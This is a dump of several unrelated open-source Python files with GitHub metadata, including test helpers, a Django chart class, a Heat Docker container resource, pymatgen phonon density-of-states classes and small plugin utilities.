"id": "613cf09d418c6792c95c41295161131b208d046a",
"size": "19442",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "libs/python_scripts/MetaPathways_parse_custom_hits.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "6380"
},
{
"name": "Perl",
"bytes": "321958"
},
{
"name": "Python",
"bytes": "1229127"
},
{
"name": "Shell",
"bytes": "2866"
}
],
"symlink_target": ""
} |
import codecs
import os.path
import xml.etree.ElementTree as ET
from contextlib import contextmanager
from io import BytesIO
import requests_mock
import six
__here__ = os.path.abspath(os.path.dirname(__file__))
def _parse_xml(data, strip_ns=False):
if six.PY2 and isinstance(data, six.text_type):
data = data.encode("utf8")
elif six.PY3:
data = bytearray(data, "utf8")
try:
it = ET.iterparse(BytesIO(data))
for _, el in it:
if '}' in el.tag and strip_ns:
# strip all namespaces
el.tag = el.tag.split('}', 1)[1]
return it.root
except Exception as err:
snippet = repr(data)
if len(snippet) > 35:
snippet = snippet[:35] + " ..."
raise ValueError("Unable to parse XML: {0} ({1})".format(err, snippet))
@contextmanager
def text(path, encoding="utf8"):
with codecs.open(os.path.join(__here__, path), 'r', encoding=encoding) as resource_fh:
yield resource_fh
@contextmanager
def xml(path, encoding="utf8"):
with codecs.open(os.path.join(__here__, path), 'r', encoding=encoding) as resource_fh:
yield _parse_xml(resource_fh.read(), strip_ns=True)
@contextmanager
def mock_http(path, url, encoding="utf8"):
with text(path, encoding) as resource:
with requests_mock.Mocker() as mock:
mock.get(url, text=resource.read())
yield mock
| {
"content_hash": "11c0d643cd19207b9e92e72fda279002",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 90,
"avg_line_length": 28.56,
"alnum_prop": 0.6162464985994398,
"repo_name": "beardypig/streamlink",
"id": "0a096e5c1694e326b4ecdb9801815f0f18ec36c5",
"size": "1428",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/resources/__init__.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "838"
},
{
"name": "Python",
"bytes": "1538432"
},
{
"name": "Shell",
"bytes": "18707"
}
],
"symlink_target": ""
} |
import json
from abc import abstractmethod
from django.utils.six import with_metaclass
from django.utils.html import format_html, mark_safe
from .utils import DateTimeEncoder, OptionsDict
class ChartMeta(type):
def __new__(cls, name, bases, attrs):
if 'options' in attrs:
options = OptionsDict(attrs['options'])
options.inherit(getattr(bases[0], 'options', {}))
attrs['options'] = options
return super(ChartMeta, cls).__new__(cls, name, bases, attrs)
class Chart(with_metaclass(ChartMeta, object)):
options = {}
columns = None
chart_type = 'LineChart'
@abstractmethod
def get_data(self):
raise NotImplementedError
def chart_id(self):
return str(hash(self))
def to_html(self):
data = {
'cols': self.columns,
'rows': list(self.get_data()),
}
json_data = json.dumps(data, cls=DateTimeEncoder)
return format_html(
"<script type='text/json' id='{0}'>{1}</script>"
"<div "
"data-chart-options='{2}'"
"data-chart-id='{0}'"
"data-chart-type='{3}'"
"></div>",
self.chart_id(),
mark_safe(json_data),
json.dumps(self.options),
self.chart_type,
)
def __str__(self):
return self.to_html()
def __unicode__(self):
return self.to_html()
# class ComboChart(Chart):
# chart_type = 'ComboChart'
class LineChart(Chart):
chart_type = 'LineChart'
class GeoChart(Chart):
chart_type = 'GeoChart'
class CoreChart(Chart):
chart_type = 'CoreChart'
class AreaChart(Chart):
chart_type = 'AreaChart'
class BarChart(Chart):
chart_type = 'BarChart'
class BubbleChart(Chart):
chart_type = 'BubbleChart'
class CandlestickChart(Chart):
chart_type = 'CandlestickChart'
class Histogram(Chart):
chart_type = 'Histogram'
class ColumnChart(Chart):
chart_type = 'ColumnChart'
class PieChart(Chart):
chart_type = 'PieChart'
class ScatterChart(Chart):
chart_type = 'ScatterChart'
class SparklineChart(Chart):
chart_type = 'SparklineChart'
class SteppedAreaChart(Chart):
chart_type = 'SteppedAreaChart'
| {
"content_hash": "1fd8d2d0c81a5017a17fad410ec58399",
"timestamp": "",
"source": "github",
"line_count": 114,
"max_line_length": 69,
"avg_line_length": 19.87719298245614,
"alnum_prop": 0.6015004413062666,
"repo_name": "danpalmer/django-google-charts",
"id": "6ed9977468b6aa79181b08ea520fe9e3616a141d",
"size": "2266",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_google_charts/charts.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "1207"
},
{
"name": "Python",
"bytes": "8878"
}
],
"symlink_target": ""
} |
import shutil
from cses.tasks.base import Base
template = """#!/usr/bin/env python3
# task: {0}
"""
class Py3Task(Base):
def __init__(self):
super().__init__("Python3", ["py3"], template)
def _prepare(self, filename):
shutil.copy2(filename, self.getfile())
return "", "", 0
def _run_cmd(self, filename):
return ["python3", filename]
| {
"content_hash": "4ac4893cc655ae65edc8f8e2a56acd11",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 54,
"avg_line_length": 21.22222222222222,
"alnum_prop": 0.5837696335078534,
"repo_name": "JuhaniImberg/cses.py",
"id": "14018237835d8409e25d4dc4bff2a1a8e9f98d59",
"size": "382",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cses/tasks/py3.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "30397"
}
],
"symlink_target": ""
} |
import string
import logging
from setup_logger import create_logger
logger = create_logger(name="aws_api_tools.py")
def api_response(statusCode=500, headers={'Content-Type':'text/html'}, body='Internal Service Error'):
if statusCode < 100 or statusCode > 599:
raise ValueError('Invalid HTTP statusCode')
return_value = {
'statusCode': statusCode,
'headers' : headers,
'body' : body
}
logger.debug(return_value)
return return_value
def get_domain_from_proxy_api_gateway(event):
if event['headers'] is None:
return "https://testinvocation/approve"
if 'amazonaws.com' in event['headers']['Host']:
return "https://{domain}/{stage}/".format( domain=event['headers']['Host'],
stage=event['requestContext']['stage'])
else:
return "https://{domain}/".format(domain=event['headers']['Host'])
def api_website(website_body='', safe_substitute_dict={'domain':'http://example.domain'}):
logger.debug(website_body)
logger.debug(safe_substitute_dict)
body = website_body if website_body else \
"""
<html>
<body>
<title>Webpage serverd from API Gateway and Lambda</title>
<h1>This is an example of an HTTP Get Responses for a Lambda/API Gateway served website</h1>
The domain is: $domain
</body>
</html>
"""
logger.debug(body)
if website_body and safe_substitute_dict:
for variable in safe_substitute_dict:
if '${variable}'.format(variable=variable) not in body:
logger.debug('${variable}'.format(variable=variable))
raise ValueError('A variable to be replaced in the body must be represented by a $variable')
compiled_body = string.Template(body).safe_substitute(safe_substitute_dict)
logger.debug(compiled_body)
return api_response(statusCode=200, body=compiled_body)
| {
"content_hash": "eb6cc6d0c298798c376984d04ef22cd7",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 108,
"avg_line_length": 35.224137931034484,
"alnum_prop": 0.6079295154185022,
"repo_name": "1Strategy/security-fairy",
"id": "25d6505de5398b4d3ecf70177ac1a207334d307b",
"size": "2043",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "aws_api_tools.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "112759"
}
],
"symlink_target": ""
} |
import distutils
from oslo_log import log as logging
import six
from heat.common import exception
from heat.common.i18n import _
from heat.common.i18n import _LW
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine import resource
from heat.engine import support
LOG = logging.getLogger(__name__)
DOCKER_INSTALLED = False
MIN_API_VERSION_MAP = {'read_only': '1.17', 'cpu_shares': '1.8',
'devices': '1.14', 'cpu_set': '1.12'}
DEVICE_PATH_REGEX = r"^/dev/[/_\-a-zA-Z0-9]+$"
# conditionally import so tests can work without having the dependency
# satisfied
try:
import docker
DOCKER_INSTALLED = True
except ImportError:
docker = None
class DockerContainer(resource.Resource):
support_status = support.SupportStatus(
status=support.UNSUPPORTED,
message=_('This resource is not supported, use at your own risk.'))
PROPERTIES = (
DOCKER_ENDPOINT, HOSTNAME, USER, MEMORY, PORT_SPECS,
PRIVILEGED, TTY, OPEN_STDIN, STDIN_ONCE, ENV, CMD, DNS,
IMAGE, VOLUMES, VOLUMES_FROM, PORT_BINDINGS, LINKS, NAME,
RESTART_POLICY, CAP_ADD, CAP_DROP, READ_ONLY, CPU_SHARES,
DEVICES, CPU_SET
) = (
'docker_endpoint', 'hostname', 'user', 'memory', 'port_specs',
'privileged', 'tty', 'open_stdin', 'stdin_once', 'env', 'cmd', 'dns',
'image', 'volumes', 'volumes_from', 'port_bindings', 'links', 'name',
'restart_policy', 'cap_add', 'cap_drop', 'read_only', 'cpu_shares',
'devices', 'cpu_set'
)
ATTRIBUTES = (
INFO, NETWORK_INFO, NETWORK_IP, NETWORK_GATEWAY,
NETWORK_TCP_PORTS, NETWORK_UDP_PORTS, LOGS, LOGS_HEAD,
LOGS_TAIL,
) = (
'info', 'network_info', 'network_ip', 'network_gateway',
'network_tcp_ports', 'network_udp_ports', 'logs', 'logs_head',
'logs_tail',
)
_RESTART_POLICY_KEYS = (
POLICY_NAME, POLICY_MAXIMUM_RETRY_COUNT,
) = (
'Name', 'MaximumRetryCount',
)
_DEVICES_KEYS = (
PATH_ON_HOST, PATH_IN_CONTAINER, PERMISSIONS
) = (
'path_on_host', 'path_in_container', 'permissions'
)
_CAPABILITIES = ['SETPCAP', 'SYS_MODULE', 'SYS_RAWIO', 'SYS_PACCT',
'SYS_ADMIN', 'SYS_NICE', 'SYS_RESOURCE', 'SYS_TIME',
'SYS_TTY_CONFIG', 'MKNOD', 'AUDIT_WRITE',
'AUDIT_CONTROL', 'MAC_OVERRIDE', 'MAC_ADMIN',
'NET_ADMIN', 'SYSLOG', 'CHOWN', 'NET_RAW',
'DAC_OVERRIDE', 'FOWNER', 'DAC_READ_SEARCH', 'FSETID',
'KILL', 'SETGID', 'SETUID', 'LINUX_IMMUTABLE',
'NET_BIND_SERVICE', 'NET_BROADCAST', 'IPC_LOCK',
'IPC_OWNER', 'SYS_CHROOT', 'SYS_PTRACE', 'SYS_BOOT',
'LEASE', 'SETFCAP', 'WAKE_ALARM', 'BLOCK_SUSPEND', 'ALL']
properties_schema = {
DOCKER_ENDPOINT: properties.Schema(
properties.Schema.STRING,
_('Docker daemon endpoint (by default the local docker daemon '
'will be used).'),
default=None
),
HOSTNAME: properties.Schema(
properties.Schema.STRING,
_('Hostname of the container.'),
default=''
),
USER: properties.Schema(
properties.Schema.STRING,
_('Username or UID.'),
default=''
),
MEMORY: properties.Schema(
properties.Schema.INTEGER,
_('Memory limit (Bytes).')
),
PORT_SPECS: properties.Schema(
properties.Schema.LIST,
_('TCP/UDP ports mapping.'),
default=None
),
PORT_BINDINGS: properties.Schema(
properties.Schema.MAP,
_('TCP/UDP ports bindings.'),
),
LINKS: properties.Schema(
properties.Schema.MAP,
_('Links to other containers.'),
),
NAME: properties.Schema(
properties.Schema.STRING,
_('Name of the container.'),
),
PRIVILEGED: properties.Schema(
properties.Schema.BOOLEAN,
_('Enable extended privileges.'),
default=False
),
TTY: properties.Schema(
properties.Schema.BOOLEAN,
_('Allocate a pseudo-tty.'),
default=False
),
OPEN_STDIN: properties.Schema(
properties.Schema.BOOLEAN,
_('Open stdin.'),
default=False
),
STDIN_ONCE: properties.Schema(
properties.Schema.BOOLEAN,
_('If true, close stdin after the 1 attached client disconnects.'),
default=False
),
ENV: properties.Schema(
properties.Schema.LIST,
_('Set environment variables.'),
),
CMD: properties.Schema(
properties.Schema.LIST,
_('Command to run after spawning the container.'),
default=[]
),
DNS: properties.Schema(
properties.Schema.LIST,
_('Set custom dns servers.'),
),
IMAGE: properties.Schema(
properties.Schema.STRING,
_('Image name.')
),
VOLUMES: properties.Schema(
properties.Schema.MAP,
_('Create a bind mount.'),
default={}
),
VOLUMES_FROM: properties.Schema(
properties.Schema.LIST,
_('Mount all specified volumes.'),
default=''
),
RESTART_POLICY: properties.Schema(
properties.Schema.MAP,
_('Restart policies (only supported for API version >= 1.2.0).'),
schema={
POLICY_NAME: properties.Schema(
properties.Schema.STRING,
_('The behavior to apply when the container exits.'),
default='no',
constraints=[
constraints.AllowedValues(['no', 'on-failure',
'always']),
]
),
POLICY_MAXIMUM_RETRY_COUNT: properties.Schema(
properties.Schema.INTEGER,
_('A maximum restart count for the '
'on-failure policy.'),
default=0
)
},
default={},
support_status=support.SupportStatus(version='2015.1')
),
CAP_ADD: properties.Schema(
properties.Schema.LIST,
_('Be used to add kernel capabilities (only supported for '
'API version >= 1.2.0).'),
schema=properties.Schema(
properties.Schema.STRING,
_('The security features provided by Linux kernels.'),
constraints=[
constraints.AllowedValues(_CAPABILITIES),
]
),
default=[],
support_status=support.SupportStatus(version='2015.1')
),
CAP_DROP: properties.Schema(
properties.Schema.LIST,
_('Be used to drop kernel capabilities (only supported for '
'API version >= 1.2.0).'),
schema=properties.Schema(
properties.Schema.STRING,
_('The security features provided by Linux kernels.'),
constraints=[
constraints.AllowedValues(_CAPABILITIES),
]
),
default=[],
support_status=support.SupportStatus(version='2015.1')
),
READ_ONLY: properties.Schema(
properties.Schema.BOOLEAN,
_('If true, mount the container\'s root filesystem '
'as read only (only supported for API version >= %s).') %
MIN_API_VERSION_MAP['read_only'],
default=False,
support_status=support.SupportStatus(version='2015.1'),
),
CPU_SHARES: properties.Schema(
properties.Schema.INTEGER,
_('Relative weight which determines the allocation of the CPU '
'processing power(only supported for API version >= %s).') %
MIN_API_VERSION_MAP['cpu_shares'],
default=0,
support_status=support.SupportStatus(version='5.0.0'),
),
DEVICES: properties.Schema(
properties.Schema.LIST,
_('Device mappings (only supported for API version >= %s).') %
MIN_API_VERSION_MAP['devices'],
schema=properties.Schema(
properties.Schema.MAP,
schema={
PATH_ON_HOST: properties.Schema(
properties.Schema.STRING,
_('The device path on the host.'),
constraints=[
constraints.Length(max=255),
constraints.AllowedPattern(DEVICE_PATH_REGEX),
],
required=True
),
PATH_IN_CONTAINER: properties.Schema(
properties.Schema.STRING,
_('The device path of the container'
' mappings to the host.'),
constraints=[
constraints.Length(max=255),
constraints.AllowedPattern(DEVICE_PATH_REGEX),
],
),
PERMISSIONS: properties.Schema(
properties.Schema.STRING,
_('The permissions of the container to'
' read/write/create the devices.'),
constraints=[
constraints.AllowedValues(['r', 'w', 'm',
'rw', 'rm', 'wm',
'rwm']),
],
default='rwm'
)
}
),
default=[],
support_status=support.SupportStatus(version='5.0.0'),
),
CPU_SET: properties.Schema(
properties.Schema.STRING,
_('The CPUs in which to allow execution '
'(only supported for API version >= %s).') %
MIN_API_VERSION_MAP['cpu_set'],
support_status=support.SupportStatus(version='5.0.0'),
)
}
attributes_schema = {
INFO: attributes.Schema(
_('Container info.')
),
NETWORK_INFO: attributes.Schema(
_('Container network info.')
),
NETWORK_IP: attributes.Schema(
_('Container ip address.')
),
NETWORK_GATEWAY: attributes.Schema(
_('Container ip gateway.')
),
NETWORK_TCP_PORTS: attributes.Schema(
_('Container TCP ports.')
),
NETWORK_UDP_PORTS: attributes.Schema(
_('Container UDP ports.')
),
LOGS: attributes.Schema(
_('Container logs.')
),
LOGS_HEAD: attributes.Schema(
_('Container first logs line.')
),
LOGS_TAIL: attributes.Schema(
_('Container last logs line.')
),
}
def get_client(self):
client = None
if DOCKER_INSTALLED:
endpoint = self.properties.get(self.DOCKER_ENDPOINT)
if endpoint:
client = docker.Client(endpoint)
else:
client = docker.Client()
return client
def _parse_networkinfo_ports(self, networkinfo):
tcp = []
udp = []
for port, info in six.iteritems(networkinfo['Ports']):
p = port.split('/')
if not info or len(p) != 2 or 'HostPort' not in info[0]:
continue
port = info[0]['HostPort']
if p[1] == 'tcp':
tcp.append(port)
elif p[1] == 'udp':
udp.append(port)
return (','.join(tcp), ','.join(udp))
def _container_networkinfo(self, client, resource_id):
info = client.inspect_container(self.resource_id)
networkinfo = info['NetworkSettings']
ports = self._parse_networkinfo_ports(networkinfo)
networkinfo['TcpPorts'] = ports[0]
networkinfo['UdpPorts'] = ports[1]
return networkinfo
def _resolve_attribute(self, name):
if not self.resource_id:
return
if name == 'info':
client = self.get_client()
return client.inspect_container(self.resource_id)
if name == 'network_info':
client = self.get_client()
networkinfo = self._container_networkinfo(client, self.resource_id)
return networkinfo
if name == 'network_ip':
client = self.get_client()
networkinfo = self._container_networkinfo(client, self.resource_id)
return networkinfo['IPAddress']
if name == 'network_gateway':
client = self.get_client()
networkinfo = self._container_networkinfo(client, self.resource_id)
return networkinfo['Gateway']
if name == 'network_tcp_ports':
client = self.get_client()
networkinfo = self._container_networkinfo(client, self.resource_id)
return networkinfo['TcpPorts']
if name == 'network_udp_ports':
client = self.get_client()
networkinfo = self._container_networkinfo(client, self.resource_id)
return networkinfo['UdpPorts']
if name == 'logs':
client = self.get_client()
logs = client.logs(self.resource_id)
return logs
if name == 'logs_head':
client = self.get_client()
logs = client.logs(self.resource_id)
return logs.split('\n')[0]
if name == 'logs_tail':
client = self.get_client()
logs = client.logs(self.resource_id)
return logs.split('\n').pop()
def handle_create(self):
create_args = {
'image': self.properties[self.IMAGE],
'command': self.properties[self.CMD],
'hostname': self.properties[self.HOSTNAME],
'user': self.properties[self.USER],
'stdin_open': self.properties[self.OPEN_STDIN],
'tty': self.properties[self.TTY],
'mem_limit': self.properties[self.MEMORY],
'ports': self.properties[self.PORT_SPECS],
'environment': self.properties[self.ENV],
'dns': self.properties[self.DNS],
'volumes': self.properties[self.VOLUMES],
'name': self.properties[self.NAME],
'cpu_shares': self.properties[self.CPU_SHARES],
'cpuset': self.properties[self.CPU_SET]
}
client = self.get_client()
client.pull(self.properties[self.IMAGE])
result = client.create_container(**create_args)
container_id = result['Id']
self.resource_id_set(container_id)
start_args = {}
if self.properties[self.PRIVILEGED]:
start_args[self.PRIVILEGED] = True
if self.properties[self.VOLUMES]:
start_args['binds'] = self.properties[self.VOLUMES]
if self.properties[self.VOLUMES_FROM]:
start_args['volumes_from'] = self.properties[self.VOLUMES_FROM]
if self.properties[self.PORT_BINDINGS]:
start_args['port_bindings'] = self.properties[self.PORT_BINDINGS]
if self.properties[self.LINKS]:
start_args['links'] = self.properties[self.LINKS]
if self.properties[self.RESTART_POLICY]:
start_args['restart_policy'] = self.properties[self.RESTART_POLICY]
if self.properties[self.CAP_ADD]:
start_args['cap_add'] = self.properties[self.CAP_ADD]
if self.properties[self.CAP_DROP]:
start_args['cap_drop'] = self.properties[self.CAP_DROP]
if self.properties[self.READ_ONLY]:
start_args[self.READ_ONLY] = True
if (self.properties[self.DEVICES] and
not self.properties[self.PRIVILEGED]):
start_args['devices'] = self._get_mapping_devices(
self.properties[self.DEVICES])
client.start(container_id, **start_args)
return container_id
def _get_mapping_devices(self, devices):
actual_devices = []
for device in devices:
if device[self.PATH_IN_CONTAINER]:
actual_devices.append(':'.join(
[device[self.PATH_ON_HOST],
device[self.PATH_IN_CONTAINER],
device[self.PERMISSIONS]]))
else:
actual_devices.append(':'.join(
[device[self.PATH_ON_HOST],
device[self.PATH_ON_HOST],
device[self.PERMISSIONS]]))
return actual_devices
def _get_container_status(self, container_id):
client = self.get_client()
info = client.inspect_container(container_id)
return info['State']
def check_create_complete(self, container_id):
status = self._get_container_status(container_id)
exit_status = status.get('ExitCode')
if exit_status is not None and exit_status != 0:
logs = self.get_client().logs(self.resource_id)
raise exception.ResourceInError(resource_status=self.FAILED,
status_reason=logs)
return status['Running']
def handle_delete(self):
if self.resource_id is None:
return
client = self.get_client()
try:
client.kill(self.resource_id)
except docker.errors.APIError as ex:
if ex.response.status_code != 404:
raise
return self.resource_id
def check_delete_complete(self, container_id):
if container_id is None:
return True
try:
status = self._get_container_status(container_id)
except docker.errors.APIError as ex:
if ex.response.status_code == 404:
return True
raise
return (not status['Running'])
def handle_suspend(self):
if not self.resource_id:
return
client = self.get_client()
client.stop(self.resource_id)
return self.resource_id
def check_suspend_complete(self, container_id):
status = self._get_container_status(container_id)
return (not status['Running'])
def handle_resume(self):
if not self.resource_id:
return
client = self.get_client()
client.start(self.resource_id)
return self.resource_id
def check_resume_complete(self, container_id):
status = self._get_container_status(container_id)
return status['Running']
def validate(self):
super(DockerContainer, self).validate()
self._validate_arg_for_api_version()
def _validate_arg_for_api_version(self):
version = None
for key in MIN_API_VERSION_MAP:
if self.properties[key]:
if not version:
client = self.get_client()
version = client.version()['ApiVersion']
min_version = MIN_API_VERSION_MAP[key]
if compare_version(min_version, version) < 0:
raise InvalidArgForVersion(arg=key,
min_version=min_version)
def resource_mapping():
return {
'DockerInc::Docker::Container': DockerContainer,
}
def available_resource_mapping():
if DOCKER_INSTALLED:
return resource_mapping()
else:
LOG.warning(_LW("Docker plug-in loaded, but docker lib "
"not installed."))
return {}
def compare_version(v1, v2):
s1 = distutils.version.StrictVersion(v1)
s2 = distutils.version.StrictVersion(v2)
if s1 == s2:
return 0
elif s1 > s2:
return -1
else:
return 1
class InvalidArgForVersion(exception.HeatException):
msg_fmt = _('"%(arg)s" is not supported for API version '
'< "%(min_version)s"')
| {
"content_hash": "de3abe20fd8328335fc003694c7e17de",
"timestamp": "",
"source": "github",
"line_count": 555,
"max_line_length": 79,
"avg_line_length": 36.84324324324324,
"alnum_prop": 0.5283157276995305,
"repo_name": "dims/heat",
"id": "a87fc6ec26758f0b14acca6d1758d7a190ae6b92",
"size": "21082",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "contrib/heat_docker/heat_docker/resources/docker_container.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "7618889"
},
{
"name": "Shell",
"bytes": "32548"
}
],
"symlink_target": ""
} |
from __future__ import division, unicode_literals
import numpy as np
from pymatgen.core.structure import Structure
from pymatgen.util.coord_utils import get_linear_interpolated_value
from monty.json import MSONable
"""
This module defines classes to represent the phonon density of states, etc.
"""
class PhononDos(MSONable):
"""
Basic DOS object. All other DOS objects are extended versions of this
object.
Args:
frequencies: A sequences of frequencies in THz
densities: A list representing the density of states.
"""
def __init__(self, frequencies, densities):
self.frequencies = np.array(frequencies)
self.densities = np.array(densities)
def get_smeared_densities(self, sigma):
"""
Returns the densities, but with a Gaussian smearing of
std dev sigma applied.
Args:
sigma: Std dev of Gaussian smearing function.
Returns:
Gaussian-smeared densities.
"""
from scipy.ndimage.filters import gaussian_filter1d
diff = [self.frequencies[i + 1] - self.frequencies[i]
for i in range(len(self.frequencies) - 1)]
avgdiff = sum(diff) / len(diff)
smeared_dens = gaussian_filter1d(self.densities, sigma / avgdiff)
return smeared_dens
def __add__(self, other):
"""
Adds two DOS together. Checks that frequency scales are the same.
Otherwise, a ValueError is thrown.
Args:
other: Another DOS object.
Returns:
Sum of the two DOSs.
"""
if not all(np.equal(self.frequencies, other.frequencies)):
raise ValueError("Frequencies of both DOS are not compatible!")
densities = self.frequencies + other.frequencies
return PhononDos(self.frequencies, densities)
def __radd__(self, other):
"""
Reflected addition of two DOS objects
Args:
other: Another DOS object.
Returns:
Sum of the two DOSs.
"""
return self.__add__(other)
def get_interpolated_value(self, frequency):
"""
Returns interpolated density for a particular frequency.
Args:
frequency: frequency to return the density for.
"""
return get_linear_interpolated_value(self.frequencies,
self.densities, frequency)
def __str__(self):
"""
Returns a string which can be easily plotted (using gnuplot).
"""
stringarray = ["#{:30s} {:30s}".format("Frequency", "Density")]
for i, frequency in enumerate(self.frequencies):
stringarray.append("{:.5f} {:.5f}"
.format(frequency, self.densities[i]))
return "\n".join(stringarray)
@classmethod
def from_dict(cls, d):
"""
Returns PhononDos object from dict representation of PhononDos.
"""
return cls(d["frequencies"], d["densities"])
def as_dict(self):
"""
Json-serializable dict representation of PhononDos.
"""
return {"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"frequencies": list(self.frequencies),
"densities": list(self.densities)}
class CompletePhononDos(PhononDos):
"""
This wrapper class defines a total dos, and also provides a list of PDos.
Args:
structure: Structure associated with this particular DOS.
total_dos: total Dos for structure
pdoss: The pdoss are supplied as an {Site: Densities}
.. attribute:: pdos
Dict of partial densities of the form {Site:Densities}
"""
def __init__(self, structure, total_dos, pdoss):
super(CompletePhononDos, self).__init__(
frequencies=total_dos.frequencies, densities=total_dos.densities)
self.pdos = pdoss
self.structure = structure
def get_site_dos(self, site):
"""
Get the Dos for a site.
Args:
site: Site in Structure associated with CompletePhononDos.
Returns:
PhononDos containing summed orbital densities for site.
"""
return PhononDos(self.frequencies, self.pdos[site])
def get_element_dos(self):
"""
Get element projected Dos.
Returns:
dict of {Element: Dos}
"""
el_dos = {}
for site, atom_dos in self.pdos.items():
el = site.specie
if el not in el_dos:
el_dos[el] = atom_dos
else:
el_dos[el] += atom_dos
return {el: PhononDos(self.frequencies, densities)
for el, densities in el_dos.items()}
@classmethod
def from_dict(cls, d):
"""
Returns CompleteDos object from dict representation.
"""
tdos = PhononDos.from_dict(d)
struct = Structure.from_dict(d["structure"])
pdoss = {}
for at, pdos in zip(struct, d["pdos"]):
pdoss[at] = pdos
return cls(struct, tdos, pdoss)
def as_dict(self):
"""
Json-serializable dict representation of CompletePhononDos.
"""
d = {"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"structure": self.structure.as_dict(),
"frequencies": list(self.frequencies),
"densities": list(self.densities),
"pdos": []}
if len(self.pdos) > 0:
for at in self.structure:
d["pdos"].append(list(self.pdos[at]))
return d
def __str__(self):
return "Complete phonon DOS for " + str(self.structure)
| {
"content_hash": "5c575ddaaa865957328e407b65ccdb2b",
"timestamp": "",
"source": "github",
"line_count": 191,
"max_line_length": 77,
"avg_line_length": 30.31413612565445,
"alnum_prop": 0.573747841105354,
"repo_name": "xhqu1981/pymatgen",
"id": "03b099df6b0c1af8c108838bd71e9789524703b5",
"size": "5900",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pymatgen/phonon/dos.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "838"
},
{
"name": "Common Lisp",
"bytes": "3029065"
},
{
"name": "Perl",
"bytes": "229104"
},
{
"name": "Propeller Spin",
"bytes": "4026362"
},
{
"name": "Python",
"bytes": "5608308"
},
{
"name": "Roff",
"bytes": "868"
}
],
"symlink_target": ""
} |
from importlib import import_module
def __dir__():
"""
Using the __dir__ and __getattr__ functions allows
to inspect the availability of modules without loading them
:return:
"""
import pkgutil
names = [
name
for importer, name, ispkg in pkgutil.iter_modules(__path__)
if not ispkg and name != "base"
]
return names + ["custom", "noData"]
def __getattr__(name):
names = __dir__()
print(names)
if name in names:
try:
db_module = import_module("." + name, __name__)
except ImportError:
db_module = import_module(".base", __name__)
return getattr(db_module, name)
else:
raise AttributeError("{} is not a member of spotpy.database")
def get_datawriter(dbformat, *args, **kwargs):
"""Given a dbformat (ram, csv, sql, noData, etc), return the constructor
of the appropriate class from this file.
"""
db_class = __getattr__(dbformat)
datawriter = db_class(*args, **kwargs)
return datawriter
| {
"content_hash": "4e3f2737541590f8d527b2cf41f74fc6",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 76,
"avg_line_length": 26.846153846153847,
"alnum_prop": 0.5931232091690545,
"repo_name": "thouska/spotpy",
"id": "89ed286f7f280585f68117941cec6cbfd9622867",
"size": "1047",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/spotpy/database/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "1032"
},
{
"name": "Cython",
"bytes": "4110"
},
{
"name": "Makefile",
"bytes": "433"
},
{
"name": "Python",
"bytes": "690905"
},
{
"name": "Shell",
"bytes": "304"
}
],
"symlink_target": ""
} |
import skbio
from ..plugin_setup import plugin
from . import NewickFormat
@plugin.register_transformer
def _1(data: skbio.TreeNode) -> NewickFormat:
ff = NewickFormat()
with ff.open() as fh:
data.write(fh, format='newick')
return ff
@plugin.register_transformer
def _2(ff: NewickFormat) -> skbio.TreeNode:
with ff.open() as fh:
return skbio.TreeNode.read(fh, format='newick', verify=False)
| {
"content_hash": "d3a2cd4aa0d8991a020753685bdc9a8a",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 69,
"avg_line_length": 23.72222222222222,
"alnum_prop": 0.6908665105386417,
"repo_name": "qiime2/q2-types",
"id": "cfa5e93485781135167fa00203c319d4d9e980e8",
"size": "777",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "q2_types/tree/_transformer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "269"
},
{
"name": "Python",
"bytes": "418135"
},
{
"name": "TeX",
"bytes": "1121"
}
],
"symlink_target": ""
} |
import unittest
from bok_choy.web_app_test import WebAppTest
from pages import GitHubSearchPage, GitHubSearchResultsPage
class TestGitHub(WebAppTest):
"""
Tests for the GitHub site.
"""
def setUp(self):
"""
Instantiate the page object.
"""
super().setUp()
self.github_search_page = GitHubSearchPage(self.browser)
def test_page_existence(self):
"""
Make sure that the page is accessible.
"""
self.github_search_page.visit()
def test_search(self):
"""
Make sure that you can search for something.
"""
self.github_search_page.visit().search_for_terms('user:openedx repo:edx-platform')
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "9691bc13ddcabbccd294032f631c01be",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 90,
"avg_line_length": 24.612903225806452,
"alnum_prop": 0.6081258191349934,
"repo_name": "edx/bok-choy",
"id": "52fda6b14dab0e5f33fb9dd8990fd8a9ac9b0e04",
"size": "763",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/code/round_2/test_search.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "11992"
},
{
"name": "JavaScript",
"bytes": "1203"
},
{
"name": "Makefile",
"bytes": "2497"
},
{
"name": "Python",
"bytes": "181702"
}
],
"symlink_target": ""
} |
